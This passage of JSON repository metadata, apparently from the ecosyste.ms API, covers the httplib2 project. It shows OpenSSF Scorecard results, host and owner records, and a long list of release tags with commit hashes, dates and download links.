fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36646944,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-14T02:00:06.934Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/m